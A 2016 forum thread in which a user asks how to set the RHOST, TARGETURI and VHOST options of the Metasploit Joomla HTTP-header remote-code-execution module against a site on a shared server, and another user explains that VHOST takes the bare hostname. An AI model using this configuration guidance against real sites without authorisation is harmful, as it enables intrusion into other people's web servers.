updatesvc Posted February 8, 2016 Share Posted February 8, 2016 (edited) I am trying to exploit the common joomla CMS application. Here is some info on the exploit. https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce To use the exploit in msfconsole type : use exploit/multi/http/joomla_http_header_rce So here comes my question. In the options for the exploit comes my problem show options ###output below### Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 1.2.3.4 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application VHOST no HTTP server virtual host My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names) Imagine this scenario: target website running joomla is http://www.joomla-target.com/joomla/ on port 80 domain is hosted on 1.2.3.4 but 1.2.3.4:80 is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding) I hope you have understood the scenario: So what will be the options for RHOST TARGETURI VHOST RPORT Please help. Thanks in advance. Edited February 8, 2016 by updatesvc Quote Link to comment Share on other sites More sharing options...
cooper Posted February 9, 2016 Share Posted February 9, 2016 It works like this. You have BigProvider.com where people can purchase hosting for joomla sites. This normally results in 2 URLs for the same website: http://BigProvider.com/JoomlaFanboi http://JoomlaFanboi.com In this case JoomlaFanboi.com is the target vhost on BigProvider.com If it's just JoomlaFanboi.com self-hosting the site, punch them in for RHOST and leave VHOST blank (as it says, it's not required). If it isn't and you know the main provider (whois should tell you all you need to know) give those values. Quote Link to comment Share on other sites More sharing options...
updatesvc Posted February 9, 2016 Author Share Posted February 9, 2016 (edited) @cooper Thanks for replying can you be a little specific about your answer. Let me explain my scenario a bit in detail. http://www.joomla-target.com/joomla/ is hosted on a VPS with this ip 1.2.3.4 along with some other few websites. So will the setting be: Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 1.2.3.4 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /joomla/ yes The base path to the Joomla application VHOST http://www.joomla-target.com no HTTP server virtual host or Name Current Setting Required Description ---- --------------- -------- ----------- HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 1.2.3.4 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /joomla/ yes The base path to the Joomla application VHOST www.joomla-target.com no HTTP server virtual host I hope I am not asking too much. Edited February 9, 2016 by updatesvc Quote Link to comment Share on other sites More sharing options...
cooper Posted February 9, 2016 Share Posted February 9, 2016 It would be the second because they're asking for the HOST and not the URL or PATH. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.